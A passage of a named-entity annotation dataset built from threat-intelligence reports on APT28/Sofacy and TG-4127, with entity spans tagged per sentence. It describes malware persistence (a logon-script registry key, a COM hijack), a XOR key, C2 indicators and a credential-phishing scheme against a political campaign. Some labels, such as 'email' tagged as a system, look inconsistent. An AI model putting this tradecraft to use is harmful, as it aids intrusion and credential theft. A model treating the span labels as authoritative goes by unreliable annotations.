also see 2 VBA variable names : PathPld , probably for Path Payload , and PathPldBt , for Path Payload Batch .", "spans": [{"start": 18, "end": 21, "label": "System"}]} {"text": "As opposed to previous campaigns performed by this actor , this latest version does not contain privilege escalation and it simply executes the payload and configures persistence mechanisms .", "spans": []} {"text": "The dropper installs 2 files :", "spans": []} {"text": "netwf.bat :", "spans": [{"start": 0, "end": 9, "label": "Indicator"}]} {"text": "executes netwf.dll netwf.dll :", "spans": [{"start": 9, "end": 18, "label": "Indicator"}, {"start": 19, "end": 28, "label": "Indicator"}]} {"text": "the payload .", "spans": []} {"text": "The dropper implements 2 persistence mechanisms :", "spans": []} {"text": "HKCU\\Environment\\UserInitMprLogonScript to execute the netwf.bat file COM Object hijack of the following CLSID : {BCDE0395-E52F-467C-8E3D-C4579291692E} , the CLSID of the class MMDeviceEnumerator .", "spans": [{"start": 55, "end": 64, "label": "Indicator"}, {"start": 105, "end": 110, "label": "System"}, {"start": 158, "end": 163, "label": "System"}]} {"text": "These 2 techniques have also been previously used by this actor .", "spans": []} {"text": "Finally the payload is executed by rundll32.exe ( and the ordinal #1 in argument ) or by explorer.exe if the COM Object hijack is performed .", "spans": [{"start": 35, "end": 47, "label": "Indicator"}, {"start": 89, "end": 101, "label": "Indicator"}]} {"text": "In this case , explorer.exe will instance the MMDeviceEnumerator class and will execute the payload .", "spans": [{"start": 15, "end": 27, "label": "Indicator"}]} {"text": "The payload features are similar to the previous versions of Seduploader .", "spans": [{"start": 61, "end": 72, "label": "Malware"}]} {"text": "We can compare it to the sample e338d49c270baf64363879e5eecb8fa6bdde8ad9 used in May 2017 by Group 74 .", "spans": [{"start": 32, "end": 72, "label": "Indicator"}, 
{"start": 93, "end": 101, "label": "Organization"}]} {"text": "Of the 195 functions of the new sample , 149 are strictly identical , 16 match at 90% and 2 match at 80% .", "spans": []} {"text": "In the previous campaign where adversaries used Office document exploits as an infection vector , the payload was executed in the Office word process .", "spans": [{"start": 48, "end": 54, "label": "System"}, {"start": 130, "end": 136, "label": "System"}]} {"text": "In this campaign , adversaries did not use any exploit .", "spans": []} {"text": "Instead , the payload is executed in standalone mode by rundll32.exe .", "spans": [{"start": 56, "end": 68, "label": "Indicator"}]} {"text": "Adversaries also changed some constants , such as the XOR key used in the previous version .", "spans": []} {"text": "The key in our version is : key=b\"\\x08\\x7A\\x05\\x04\\x60\\x7c\\x3e\\x3c\\x5d\\x0b\\x18\\x3c\\x55\\x64\" .", "spans": []} {"text": "The MUTEX name is different too : FG00nxojVs4gLBnwKc7HhmdK0h .", "spans": []} {"text": "Here are some of the Seduploader features :", "spans": [{"start": 21, "end": 32, "label": "Malware"}]} {"text": "Screenshot capture ( with the GDI API ) ;", "spans": [{"start": 30, "end": 33, "label": "System"}, {"start": 34, "end": 37, "label": "System"}]} {"text": "data/configuration Exfiltration ;", "spans": []} {"text": "Execution of code ;", "spans": []} {"text": "File downloading ;", "spans": []} {"text": "The Command & Control ( CC ) of the analysed sample is myinvestgroup[.]com .", "spans": [{"start": 4, "end": 21, "label": "System"}, {"start": 24, "end": 26, "label": "System"}, {"start": 55, "end": 74, "label": "Indicator"}]} {"text": "During the investigation , the server did not provide any configuration to the infected machines .", "spans": []} {"text": "Based on the metadata of the Office documents and the PE files , the attackers had created the file on Wednesday , the 4th of October .", "spans": [{"start": 29, "end": 35, "label": "System"}, 
{"start": 54, "end": 56, "label": "System"}]} {"text": "Analysis of this campaign shows us once more that attackers are creative and use the news to compromise their targets .", "spans": []} {"text": "This campaign has most likely been created to allow the targeting of people linked to or interested in cybersecurity , so probably the people who are more sensitive to cybersecurity threats .", "spans": []} {"text": "In this case , Group 74 did not use an exploit or any 0-day but simply used scripting language embedded within the Microsoft Office document .", "spans": [{"start": 15, "end": 23, "label": "Organization"}, {"start": 54, "end": 59, "label": "Vulnerability"}, {"start": 115, "end": 124, "label": "Organization"}, {"start": 125, "end": 131, "label": "System"}]} {"text": "Due to this change , the fundamental compromise mechanism is different as the payload is executed in a standalone mode .", "spans": []} {"text": "The reasons for this are unknown , but we could suggest that they did not want to use any exploits , so that those exploits remained viable for other operations .", "spans": []} {"text": "Actors will often avoid using exploits because researchers can find and eventually patch them , which renders the actors ' weaponized platforms defunct .", "spans": []} {"text": "Additionally , the author made some small updates after publications from the security community ; again , this is common for actors of this level of sophistication : once their campaigns have been exposed , they will often change their tooling to evade detection .", "spans": []} {"text": "For example , the actor changed the XOR key and the MUTEX name .", "spans": []} {"text": "APT28 : AT THE CENTER OF THE STORM .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]} {"text": "The Democratic National Committee \u2019s ( DNC ) June 2016 announcement attributing its network breach to the Russian Government triggered an international debate over Russia \u2019s sponsorship of 
information operations against the U.S.", "spans": [{"start": 4, "end": 33, "label": "Organization"}, {"start": 39, "end": 42, "label": "Organization"}]} {"text": "Our visibility into the operations of APT28 - a group we believe the Russian Government sponsors - has given us insight into some of the government \u2019s targets , as well as its objectives and the activities designed to further them .", "spans": [{"start": 38, "end": 43, "label": "Organization"}]} {"text": "We have tracked and profiled this group through multiple investigations , endpoint and network detections , and continuous monitoring .", "spans": []} {"text": "Our visibility into APT28 \u2019s operations , which date to at least 2007 , has allowed us to understand the group \u2019s malware , operational changes , and motivations .", "spans": [{"start": 20, "end": 25, "label": "Organization"}]} {"text": "This intelligence has been critical to protecting and informing our clients , exposing this threat , and strengthening our confidence in attributing APT28 to the Russian Government .", "spans": [{"start": 149, "end": 154, "label": "Organization"}]} {"text": "On December 29 , 2016 , the Department of Homeland Security ( DHS ) and Federal Bureau of Investigation ( FBI ) released a Joint Analysis Report confirming FireEye \u2019s long-held public assessment that the Russian Government sponsors APT28 .", "spans": [{"start": 28, "end": 59, "label": "Organization"}, {"start": 62, "end": 65, "label": "Organization"}, {"start": 72, "end": 103, "label": "Organization"}, {"start": 106, "end": 109, "label": "Organization"}, {"start": 156, "end": 163, "label": "Organization"}, {"start": 232, "end": 237, "label": "Organization"}]} {"text": "Since at least 2007 , APT28 has engaged in extensive operations in support of Russian strategic interests .", "spans": [{"start": 22, "end": 27, "label": "Organization"}]} {"text": "The group , almost certainly composed of a sophisticated and prolific set of developers 
and operators , has historically collected intelligence on defense and geopolitical issues .", "spans": []} {"text": "APT28 espionage activity has primarily targeted entities in the U.S. , Europe , and the countries of the former Soviet Union , including governments and militaries , defense attaches , media entities , and dissidents and figures opposed to the current Russian Government .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]} {"text": "Over the past two years , Russia appears to have increasingly leveraged APT28 to conduct information operations commensurate with broader strategic military doctrine .", "spans": [{"start": 72, "end": 77, "label": "Organization"}]} {"text": "After compromising a victim organization , APT28 will steal internal data that is then leaked to further political narratives aligned with Russian interests .", "spans": [{"start": 43, "end": 48, "label": "Organization"}]} {"text": "To date these have included the conflict in Syria , NATO-Ukraine relations , the European Union refugee and migrant crisis , the 2016 Olympics and Paralympics Russian athlete doping scandal , public accusations regarding Russian state-sponsored hacking , and the 2016 U.S. presidential election .", "spans": [{"start": 81, "end": 95, "label": "Organization"}, {"start": 134, "end": 142, "label": "Organization"}, {"start": 147, "end": 158, "label": "Organization"}]} {"text": "This report details our observations of APT28 \u2019s targeting , and our investigation into a related breach .", "spans": [{"start": 40, "end": 45, "label": "Organization"}]} {"text": "We also provide an update on shifts in the group \u2019s tool development and use , and summarize the tactics APT28 employs to compromise its victims .", "spans": [{"start": 105, "end": 110, "label": "Organization"}]} {"text": "In October 2014 , FireEye released APT28 : A Window into Russia \u2019s Cyber Espionage Operations? 
, and characterized APT28 \u2019s activity as aligning with the Russian Government \u2019s strategic intelligence requirements .", "spans": [{"start": 18, "end": 25, "label": "Organization"}, {"start": 35, "end": 40, "label": "Organization"}, {"start": 45, "end": 51, "label": "System"}, {"start": 115, "end": 120, "label": "Organization"}]} {"text": "While tracking APT28 , we noted the group \u2019s interest in foreign governments and militaries , particularly those of European and Eastern European nations , as well as regional security organizations , such as the North Atlantic Treaty Organization ( NATO ) and the Organization for Security and Cooperation in Europe ( OSCE ) , among others .", "spans": [{"start": 15, "end": 20, "label": "Organization"}, {"start": 213, "end": 247, "label": "Organization"}, {"start": 250, "end": 254, "label": "Organization"}, {"start": 265, "end": 316, "label": "Organization"}, {"start": 319, "end": 323, "label": "Organization"}]} {"text": "Table 1 highlights some recent examples of this activity .", "spans": []} {"text": "OSCE :", "spans": [{"start": 0, "end": 4, "label": "Organization"}]} {"text": "NOVEMBER 2016 , The OSCE confirmed that it had suffered an intrusion , which a Western intelligence service attributed to APT28 .", "spans": [{"start": 20, "end": 24, "label": "Organization"}, {"start": 122, "end": 127, "label": "Organization"}]} {"text": "Germany 's Christian Democratic Union ( CDU ) :", "spans": [{"start": 11, "end": 37, "label": "Organization"}, {"start": 40, "end": 43, "label": "Organization"}]} {"text": "APRIL - MAY 2016 , Researchers at Trend Micro observed APT28 establish a fake CDU email server and launch phishing emails against CDU members in an attempt to obtain their email credentials and access their accounts .", "spans": [{"start": 55, "end": 60, "label": "Organization"}, {"start": 78, "end": 81, "label": "Organization"}, {"start": 82, "end": 87, "label": "System"}, {"start": 115, "end": 121, "label": 
"System"}, {"start": 130, "end": 133, "label": "Organization"}, {"start": 172, "end": 177, "label": "System"}]} {"text": "Pussy Riot AUGUST :", "spans": []} {"text": "2015 , APT28 targets Russian rockers and dissidents Pussy Riot via spear-phishing emails .", "spans": [{"start": 7, "end": 12, "label": "Organization"}, {"start": 82, "end": 88, "label": "System"}]} {"text": "NATO , Afghan Ministry of Foreign Affairs , Pakistani Military :", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 7, "end": 41, "label": "Organization"}, {"start": 44, "end": 62, "label": "Organization"}]} {"text": "JULY 2015 , APT28 used two domains ( nato-news.com and bbc-news.org ) to host an Adobe Flash zero-day exploit to target NATO , the Afghan Ministry of Foreign Affairs , and the Pakistani military .", "spans": [{"start": 12, "end": 17, "label": "Organization"}, {"start": 37, "end": 50, "label": "Indicator"}, {"start": 55, "end": 67, "label": "Indicator"}, {"start": 81, "end": 86, "label": "Organization"}, {"start": 87, "end": 92, "label": "System"}, {"start": 93, "end": 101, "label": "Vulnerability"}, {"start": 120, "end": 124, "label": "Organization"}, {"start": 131, "end": 165, "label": "Organization"}, {"start": 176, "end": 194, "label": "Organization"}]} {"text": "German Bundestag & Political Parties :", "spans": [{"start": 0, "end": 36, "label": "Organization"}]} {"text": "JUNE 2015 , Germany \u2019s Federal Office for Security in Information Technology ( BSI ) announced that APT28 was likely responsible for the spear phishing emails sent to members of several German political parties .", "spans": [{"start": 100, "end": 105, "label": "Organization"}, {"start": 152, "end": 158, "label": "System"}]} {"text": "The head of Germany \u2019s domestic intelligence agency , Bundesamt f\u00fcr Verfassungsschutz ( BfV ) , also attributed the June 2015 compromise of the Bundestag \u2019s networks to APT28 .", "spans": [{"start": 54, "end": 85, "label": "Organization"}, 
{"start": 88, "end": 91, "label": "Organization"}, {"start": 169, "end": 174, "label": "Organization"}]} {"text": "Kyrgyzstan Ministry of Foreign Affairs :", "spans": [{"start": 0, "end": 38, "label": "Organization"}]} {"text": "OCTOBER 2014 THROUGH SEPTEMBER 2015 , FireEye iSight Intelligence identified changes made to domain name server ( DNS ) records that suggest that APT28 intercepted email traffic from the Kyrgyzstan Ministry of Foreign Affairs after maliciously modifying DNS records of the ministry \u2019s authoritative DNS servers .", "spans": [{"start": 38, "end": 45, "label": "Organization"}, {"start": 114, "end": 117, "label": "Indicator"}, {"start": 146, "end": 151, "label": "Organization"}, {"start": 164, "end": 169, "label": "System"}, {"start": 187, "end": 225, "label": "Organization"}, {"start": 254, "end": 257, "label": "Indicator"}, {"start": 299, "end": 302, "label": "Indicator"}]} {"text": "Polish Government & Power Exchange websites :", "spans": []} {"text": "JUNE AND SEPTEMBER 2014 , APT28 employed \u201c Sedkit \u201d in conjunction with strategic web compromises to deliver \u201c Sofacy \u201d malware on Polish Government websites , and the websites of Polish energy company Power Exchange .", "spans": [{"start": 26, "end": 31, "label": "Organization"}, {"start": 43, "end": 49, "label": "Malware"}, {"start": 111, "end": 117, "label": "Malware"}]} {"text": "On September 13 , WADA confirmed that APT28 had compromised its networks and accessed athlete medical data .", "spans": [{"start": 18, "end": 22, "label": "Organization"}, {"start": 38, "end": 43, "label": "Organization"}]} {"text": "On September 12 , 2016 , the \u201c Fancy Bears \u2019 Hack Team \u201d persona claimed to have compromised WADA and released athletes \u2019 medical records as \u201c proof of American athletes taking doping. 
\u201d", "spans": [{"start": 31, "end": 42, "label": "Organization"}, {"start": 93, "end": 97, "label": "Organization"}]} {"text": "The DNC announced it had suffered a network compromise and that a subsequent investigation found evidence of two breaches , attributed to APT28 and APT29 .", "spans": [{"start": 4, "end": 7, "label": "Organization"}, {"start": 138, "end": 143, "label": "Organization"}, {"start": 148, "end": 153, "label": "Organization"}]} {"text": "FireEye analyzed the malware found on DNC networks and determined that it was consistent with our previous observations of APT28 tools .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 38, "end": 41, "label": "Organization"}, {"start": 123, "end": 128, "label": "Organization"}]} {"text": "In June 2016 , shortly after the DNC \u2019s announcement , the Guccifer 2.0 persona claimed responsibility for the DNC breach and leaked documents taken from the organization \u2019s network .", "spans": [{"start": 33, "end": 36, "label": "Organization"}, {"start": 59, "end": 67, "label": "Organization"}, {"start": 111, "end": 114, "label": "Organization"}]} {"text": "Guccifer 2.0 continued to leak batches of DNC documents through September .", "spans": [{"start": 0, "end": 8, "label": "Organization"}, {"start": 42, "end": 45, "label": "Organization"}]} {"text": "Investigators found that John Podesta , Hillary Clinton \u2019s presidential campaign chairman , was one of thousands of individuals targeted in a mass phishing scheme using shortened URLs that security researchers attributed to APT28 .", "spans": [{"start": 224, "end": 229, "label": "Organization"}]} {"text": "Throughout October and into early November , WikiLeaks published 34 batches of email correspondence stolen from John Podesta \u2019s personal email account .", "spans": [{"start": 45, "end": 54, "label": "System"}, {"start": 79, "end": 84, "label": "System"}, {"start": 137, "end": 142, "label": "System"}]} {"text": "Correspondence of 
other individuals targeted in the same phishing campaign , including former Secretary of State Colin Powell and Clinton campaign staffer William Rinehart , were published on the \u201c DC Leaks \u201d website .", "spans": []} {"text": "In July , the DCCC announced that it was investigating an ongoing \u201c cybersecurity incident \u201d that the FBI believed was linked to the compromise of the DNC .", "spans": [{"start": 14, "end": 18, "label": "Organization"}, {"start": 102, "end": 105, "label": "Organization"}, {"start": 151, "end": 154, "label": "Organization"}]} {"text": "House Speaker Nancy Pelosi later confirmed that the DCCC had suffered a network compromise .", "spans": [{"start": 52, "end": 56, "label": "Organization"}]} {"text": "Investigators indicated that the actors may have gained access to DCCC systems as early as March .", "spans": [{"start": 66, "end": 70, "label": "Organization"}]} {"text": "In August , the Guccifer 2.0 persona contacted reporters covering U.S. House of Representative races to announce newly leaked documents from the DCCC pertaining to Democratic candidates .", "spans": [{"start": 16, "end": 24, "label": "Organization"}, {"start": 71, "end": 94, "label": "Organization"}, {"start": 145, "end": 149, "label": "Organization"}]} {"text": "From August to October , Guccifer 2.0 posted several additional installments of what appear to be internal DCCC documents on \u201c his \u201d WordPress site .", "spans": [{"start": 25, "end": 33, "label": "Organization"}, {"start": 107, "end": 111, "label": "Organization"}]} {"text": "In February , FireEye identified CORESHELL traffic beaconing from TV5Monde \u2019s network , confirming that APT28 had compromised TV5Monde \u2019s network .", "spans": [{"start": 14, "end": 21, "label": "Organization"}, {"start": 33, "end": 42, "label": "System"}, {"start": 66, "end": 74, "label": "Organization"}, {"start": 104, "end": 109, "label": "Organization"}, {"start": 126, "end": 134, "label": "Organization"}]} 
{"text": "In April 2015 , alleged pro-ISIS hacktivist group CyberCaliphate defaced TV5Monde \u2019s websites and social media profiles and forced the company \u2019s 11 broadcast channels offline .", "spans": [{"start": 50, "end": 64, "label": "Organization"}, {"start": 73, "end": 81, "label": "Organization"}]} {"text": "FireEye identified overlaps between the domain registration details of CyberCaliphate \u2019s website and APT28 infrastructure .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 71, "end": 85, "label": "Organization"}, {"start": 101, "end": 106, "label": "Organization"}]} {"text": "Ukrainian officials revealed that the investigation into the compromise of the CEC \u2019s internal network identified malware traced to APT28 .", "spans": [{"start": 79, "end": 82, "label": "Organization"}, {"start": 132, "end": 137, "label": "Organization"}]} {"text": "During the May 2014 Ukrainian presidential election , purported pro-Russian hacktivists CyberBerkut conducted a series of malicious activities against the CEC including a system compromise , data destruction , a data leak , a distributed denial-of-service ( DDoS ) attack , and an attempted defacement of the CEC website with fake election results .", "spans": [{"start": 88, "end": 99, "label": "Organization"}, {"start": 155, "end": 158, "label": "Organization"}, {"start": 309, "end": 312, "label": "Organization"}]} {"text": "As news of the DNC breach spread , APT28 was preparing for another set of operations : countering the condemnation that Russia was facing after doping allegations and a threatened blanket ban of the Russian team from the upcoming Rio Games .", "spans": [{"start": 15, "end": 18, "label": "Organization"}, {"start": 35, "end": 40, "label": "Organization"}, {"start": 230, "end": 239, "label": "Organization"}]} {"text": "Russia , like many nations , has long viewed success in the Olympic Games as a source of national prestige and soft power on the world stage .", 
"spans": []} {"text": "The doping allegations and prospective ban from the Games further ostracized Russia , and likely provided motivation to actively counter the allegations by attempting to discredit anti-doping agencies and policies .", "spans": []} {"text": "Our investigation of APT28 \u2019s compromise of WADA \u2019s network , and our observations of the surrounding events reveal how Russia sought to counteract a damaging narrative and delegitimize the institutions leveling criticism .", "spans": [{"start": 21, "end": 26, "label": "Organization"}, {"start": 44, "end": 48, "label": "Organization"}]} {"text": "Since releasing our 2014 report , we continue to assess that APT28 is sponsored by the Russian Government .", "spans": [{"start": 61, "end": 66, "label": "Organization"}]} {"text": "We further assess that APT28 is the group responsible for the network compromises of WADA and the DNC and other entities related to the 2016 U.S. presidential election cycle .", "spans": [{"start": 23, "end": 28, "label": "Organization"}, {"start": 85, "end": 89, "label": "Organization"}, {"start": 98, "end": 101, "label": "Organization"}]} {"text": "These breaches involved the theft of internal data - mostly emails \u2013 that was later strategically leaked through multiple forums and propagated in a calculated manner almost certainly intended to advance particular Russian Government aims .", "spans": [{"start": 60, "end": 66, "label": "System"}]} {"text": "In a report released on January 7 2017 , the U.S. Directorate of National Intelligence described this activity as an \u201c influence campaign. 
\u201d This influence campaign - a combination of network compromises and subsequent data leaks - aligns closely with the Russian military \u2019s publicly stated intentions and capabilities .", "spans": [{"start": 50, "end": 86, "label": "Organization"}]} {"text": "Influence operations , also frequently called \u201c information operations , \u201d have a long history of inclusion in Russian strategic doctrine , and have been intentionally developed , deployed , and modernized with the advent of the internet .", "spans": []} {"text": "The recent activity in the U.S. is but one of many instances of Russian Government influence operations conducted in support of strategic political objectives , and it will not be the last .", "spans": []} {"text": "As the 2017 elections in Europe approach - most notably in Germany , France , and the Netherlands - we are already seeing the makings of similarly concerted efforts .", "spans": []} {"text": "In our 2014 report , we identified APT28 as a suspected Russian government-sponsored espionage actor .", "spans": [{"start": 35, "end": 40, "label": "Organization"}]} {"text": "We came to this conclusion in part based on forensic details left in the malware that APT28 had employed since at least 2007 .", "spans": [{"start": 86, "end": 91, "label": "Organization"}]} {"text": "We have provided an updated version of those conclusions , a layout of the tactics that they generally employ , as well as observations of apparent tactical shifts .", "spans": []} {"text": "For full details , please reference our 2014 report , APT28 : A Window into Russia \u2019s Cyber Espionage Operations ? 
APT28 employs a suite of malware with features indicative of the group \u2019s plans for continued operations , as well as the group \u2019s access to resources and skilled developers .", "spans": [{"start": 54, "end": 59, "label": "Organization"}, {"start": 64, "end": 70, "label": "System"}, {"start": 115, "end": 120, "label": "Organization"}]} {"text": "CHOPSTICK :", "spans": [{"start": 0, "end": 9, "label": "Malware"}]} {"text": "backdoor , Xagent , webhp , SPLM .", "spans": [{"start": 11, "end": 17, "label": "Malware"}, {"start": 20, "end": 25, "label": "Malware"}, {"start": 28, "end": 32, "label": "Malware"}]} {"text": "EVILTOSS :", "spans": [{"start": 0, "end": 8, "label": "Malware"}]} {"text": "backdoor , Sedreco , AZZY , Xagent , ADVSTORESHELL , NETUI .", "spans": [{"start": 11, "end": 18, "label": "Malware"}, {"start": 21, "end": 25, "label": "Malware"}, {"start": 28, "end": 34, "label": "Malware"}, {"start": 37, "end": 50, "label": "Malware"}, {"start": 53, "end": 58, "label": "Malware"}]} {"text": "GAMEFISH :", "spans": [{"start": 0, "end": 8, "label": "Malware"}]} {"text": "backdoor , Sednit , Seduploader , JHUHUGIT , Sofacy .", "spans": [{"start": 11, "end": 17, "label": "Malware"}, {"start": 20, "end": 31, "label": "Malware"}, {"start": 34, "end": 42, "label": "Malware"}, {"start": 45, "end": 51, "label": "Malware"}]} {"text": "SOURFACE :", "spans": [{"start": 0, "end": 8, "label": "Malware"}]} {"text": "downloader , Older version of CORESHELL , Sofacy .", "spans": [{"start": 30, "end": 39, "label": "Malware"}, {"start": 42, "end": 48, "label": "Malware"}]} {"text": "OLDBAIT :", "spans": [{"start": 0, "end": 7, "label": "Malware"}]} {"text": "credential harvester , Sasfis .", "spans": [{"start": 23, "end": 29, "label": "Malware"}]} {"text": "CORESHELL :", "spans": [{"start": 0, "end": 9, "label": "Malware"}]} {"text": "downloader , Newer version of SOURFACE , Sofacy .", "spans": [{"start": 30, "end": 38, "label": "Malware"}, {"start": 41, "end": 47, 
"label": "Malware"}]} {"text": "APT28 continues to evolve its toolkit and refine its tactics in what is almost certainly an effort to protect its operational effectiveness in the face of heightened public exposure and scrutiny .", "spans": [{"start": 0, "end": 5, "label": "Organization"}]} {"text": "In addition to the continued evolution of the group \u2019s first stage tools , we have also noted APT28 : Leveraging zero-day vulnerabilities in Adobe Flash Player , Java , and Windows , including CVE-2015-1701 , CVE-2015-2424 , CVE-2015-2590 , CVE-2015-3043 , CVE-2015-5119 , and CVE-2015-7645 .", "spans": [{"start": 94, "end": 99, "label": "Organization"}, {"start": 113, "end": 121, "label": "Vulnerability"}, {"start": 141, "end": 146, "label": "Organization"}, {"start": 147, "end": 152, "label": "System"}, {"start": 153, "end": 159, "label": "System"}, {"start": 162, "end": 166, "label": "System"}, {"start": 173, "end": 180, "label": "System"}, {"start": 193, "end": 206, "label": "Vulnerability"}, {"start": 209, "end": 222, "label": "Vulnerability"}, {"start": 225, "end": 238, "label": "Vulnerability"}, {"start": 241, "end": 254, "label": "Vulnerability"}, {"start": 257, "end": 270, "label": "Vulnerability"}, {"start": 277, "end": 290, "label": "Vulnerability"}]} {"text": "Using a profiling script to deploy zero-days and other tools more selectively , decreasing the chance that researchers and others will gain access to the group \u2019s tools .", "spans": [{"start": 35, "end": 44, "label": "Vulnerability"}]} {"text": "Increasing reliance on public code depositories , such as Carberp , PowerShell Empire , P.A.S. 
webshell , Metasploit modules , and others in a likely effort to accelerate their development cycle and provide plausible deniability .", "spans": [{"start": 58, "end": 65, "label": "Malware"}, {"start": 68, "end": 78, "label": "System"}, {"start": 79, "end": 85, "label": "System"}, {"start": 88, "end": 94, "label": "System"}, {"start": 106, "end": 116, "label": "System"}]} {"text": "Obtaining credentials through fabricated Google App authorization and Oauth access requests that allow the group to bypass two-factor authentication and other security measures .", "spans": [{"start": 41, "end": 47, "label": "Organization"}, {"start": 70, "end": 75, "label": "Indicator"}]} {"text": "Moving laterally through a network relying only on legitimate tools that already exist within the victims \u2019 systems , at times forgoing their traditional toolset for the duration of the compromise .", "spans": []} {"text": "Threat Group 4127 Targets Hillary Clinton Presidential Campaign .", "spans": [{"start": 0, "end": 17, "label": "Organization"}]} {"text": "The Hillary Clinton email leak was the center of the latest scandal in the news caused by Threat Group-4127 ( TG-4127 ) .", "spans": [{"start": 20, "end": 25, "label": "System"}, {"start": 90, "end": 107, "label": "Organization"}, {"start": 110, "end": 117, "label": "Organization"}]} {"text": "SecureWorks Counter Threat Unit ( CTU ) researchers track the activities of Threat Group-4127 , which targets governments , military , and international non-governmental organizations ( NGOs ) .", "spans": [{"start": 0, "end": 31, "label": "Organization"}, {"start": 34, "end": 37, "label": "Organization"}, {"start": 76, "end": 93, "label": "Organization"}]} {"text": "Components of TG-4127 operations have been reported under the names APT28 , Sofacy , Sednit , and Pawn Storm .", "spans": [{"start": 14, "end": 21, "label": "Organization"}, {"start": 68, "end": 73, "label": "Organization"}, {"start": 76, "end": 82, "label": "Organization"}, 
{"start": 85, "end": 91, "label": "Organization"}, {"start": 98, "end": 108, "label": "Organization"}]} {"text": "CTU researchers assess with moderate confidence that the group is operating from the Russian Federation and is gathering intelligence on behalf of the Russian government .", "spans": [{"start": 0, "end": 3, "label": "Organization"}]} {"text": "Between October 2015 and May 2016 , CTU researchers analyzed 8,909 Bitly links that targeted 3,907 individual Gmail accounts and corporate and organizational email accounts that use Gmail as a service .", "spans": [{"start": 36, "end": 39, "label": "Organization"}, {"start": 67, "end": 72, "label": "System"}, {"start": 110, "end": 115, "label": "System"}, {"start": 158, "end": 163, "label": "System"}, {"start": 182, "end": 187, "label": "System"}]} {"text": "In March 2016 , CTU researchers identified a spearphishing campaign using Bitly accounts to shorten malicious URLs .", "spans": [{"start": 16, "end": 19, "label": "Organization"}, {"start": 74, "end": 79, "label": "System"}]} {"text": "The targets were similar to a 2015 TG-4127 campaign \u2014 individuals in Russia and the former Soviet states , current and former military and government personnel in the U.S. 
and Europe , individuals working in the defense and government supply chain , and authors and journalists \u2014 but also included email accounts linked to the November 2016 United States presidential election .", "spans": [{"start": 35, "end": 42, "label": "Organization"}, {"start": 298, "end": 303, "label": "System"}]} {"text": "Specific targets include staff working for or associated with Hillary Clinton's presidential campaign and the Democratic National Committee ( DNC ) , including individuals managing Clinton's communications , travel , campaign finances , and advising her on policy .", "spans": [{"start": 110, "end": 139, "label": "Organization"}, {"start": 142, "end": 145, "label": "Organization"}]} {"text": "The short links in the spearphishing emails redirected victims to a TG-4127 controlled URL that spoofed a legitimate Google domain .", "spans": [{"start": 37, "end": 43, "label": "System"}, {"start": 68, "end": 75, "label": "Organization"}, {"start": 117, "end": 123, "label": "Organization"}]} {"text": "A Base64 encoded string containing the victim's full email address is passed with this URL , prepopulating a fake Google login page displayed to the victim .", "spans": [{"start": 53, "end": 58, "label": "System"}, {"start": 114, "end": 120, "label": "Organization"}]} {"text": "If a victim enters their credentials , TG-4127 can establish a session with Google and access the victim's account .", "spans": [{"start": 39, "end": 46, "label": "Organization"}, {"start": 76, "end": 82, "label": "Organization"}]} {"text": "The threat actors may be able to keep this session alive and maintain persistent access .", "spans": []} {"text": "The Hillary for America presidential campaign owns the hillaryclinton.com domain , which is used for the campaign website ( www.hillaryclinton.com ) and for email addresses used by campaign staff .", "spans": [{"start": 55, "end": 73, "label": "Indicator"}, {"start": 124, "end": 146, "label": "Indicator"}, {"start": 157, "end": 
162, "label": "System"}]} {"text": "An examination of the hillaryclinton.com DNS records shows that the domain's MX records , which indicate the mail server used by the domain , point to aspmx.l.google.com , the mail server used by Google Apps .", "spans": [{"start": 22, "end": 40, "label": "Indicator"}, {"start": 41, "end": 44, "label": "Indicator"}, {"start": 77, "end": 79, "label": "System"}, {"start": 151, "end": 169, "label": "Indicator"}, {"start": 196, "end": 202, "label": "Organization"}]} {"text": "Google Apps allows organizations to use Gmail as their organizational mail solution .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 40, "end": 45, "label": "System"}]} {"text": "TG-4127 exploited the Hillary for America campaign's use of Gmail and leveraged campaign employees' expectation of the standard Gmail login page to access their email account .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 60, "end": 65, "label": "System"}, {"start": 128, "end": 133, "label": "System"}, {"start": 161, "end": 166, "label": "System"}]} {"text": "When presented with TG-4127 's spoofed login page , victims might be convinced it was the legitimate login page for their hillaryclinton.com email account .", "spans": [{"start": 20, "end": 27, "label": "Organization"}, {"start": 122, "end": 140, "label": "Indicator"}, {"start": 141, "end": 146, "label": "System"}]} {"text": "CTU researchers observed the first short links targeting hillaryclinton.com email addresses being created in mid-March 2016 ; the last link was created in mid-May .", "spans": [{"start": 0, "end": 3, "label": "Organization"}, {"start": 57, "end": 75, "label": "Indicator"}, {"start": 76, "end": 81, "label": "System"}]} {"text": "During this period , TG-4127 created 213 short links targeting 108 email addresses on the hillaryclinton.com domain .", "spans": [{"start": 21, "end": 28, "label": "Organization"}, {"start": 67, "end": 72, "label": "System"}, {"start": 
90, "end": 108, "label": "Indicator"}]} {"text": "Through open-source research , CTU researchers identified the owners of 66 of the targeted email addresses .", "spans": [{"start": 31, "end": 34, "label": "Organization"}, {"start": 91, "end": 96, "label": "System"}]} {"text": "There was no open-source footprint for the remaining 42 addresses , suggesting that TG-4127 acquired them from another source , possibly other intelligence activity .", "spans": [{"start": 84, "end": 91, "label": "Organization"}]} {"text": "The identified email owners held a wide range of responsibilities within the Hillary for America campaign , extending from senior figures to junior employees and the group mailboxes for various regional offices .", "spans": [{"start": 15, "end": 20, "label": "System"}]} {"text": "Targeted senior figures managed communications and media affairs , policy , speech writing , finance , and travel , while junior figures arranged schedules and travel for Hillary Clinton's campaign trail .", "spans": []} {"text": "Targets held the following titles :", "spans": []} {"text": "National political director Finance director Director of strategic communications Director of scheduling Director of travel Traveling press secretary Travel coordinator .", "spans": []} {"text": "Publicly available Bitly data reveals how many of the short links were clicked , likely by a victim opening a spearphishing email and clicking the link to the fake Gmail login page .", "spans": [{"start": 19, "end": 24, "label": "System"}, {"start": 124, "end": 129, "label": "System"}, {"start": 164, "end": 169, "label": "System"}]} {"text": "Only 20 of the 213 short links have been clicked as of this publication .", "spans": []} {"text": "Eleven of the links were clicked once , four were clicked twice , two were clicked three times , and two were clicked four times .", "spans": []} {"text": "The U.S. 
